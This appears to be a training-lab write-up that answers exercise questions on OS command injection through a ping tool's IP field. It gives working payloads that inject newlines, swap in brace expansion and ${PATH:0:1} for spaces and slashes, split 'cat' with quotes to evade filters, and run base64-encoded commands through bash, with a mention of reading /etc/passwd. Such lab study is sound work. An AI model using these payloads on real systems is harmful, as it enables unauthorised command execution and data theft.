Questions
Review the HTML source code of the page to find where the front-end input validation is happening. On which line number is it?
Line 17
Try using the remaining three injection operators (new-line, &, |), and see how each works and how the output differs. Which of them only shows the output of the injected command?
Answer: |
Use what you learned in this section to execute the command 'ls -la'. What is the size of the 'index.php' file?
Ans: ip=127.0.0.1%0a{ls,-la}, 1613
Use what you learned in this section to find name of the user in the '/home' folder. What user did you find?
%0a{ls,-la,${PATH:0:1},${IFS}home} shows ls -la / but it does not show whats inside /home.
lets try and modify the payload further.
ip=127.0.0.1%0a{ls,-la,${PATH:0:1}home}
Ans:1nj3c70r
Use what you learned in this section find the content of flag.txt in the home folder of the user you previously found.
ip=127.0.0.1%0a{c'a't,${PATH:0:1}home${PATH:0:1}1nj3c70r${PATH:0:1}flag.txt} can be interpreted as ip=127.0.0.1\n cat /home/1nj3c70r/flag.txt
cat has ' in between is to bypass the filter.
cat /home/1nj3c70r/flag.txt is in the { } is to bypass filter as well.
Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1
echo -n 'find /usr/share/ | grep root | grep mysql | tail -n 1' | base64
We can do cat /flag.txt or cat /etc/passwd in the base64 code but to answer the questions, below is the command injection we want to execute after the IP address field.
bash<<<$(base64 -d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)
So the final payload is, ip=127.0.0.1%0abash<<<$(base64%09-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)
Last updated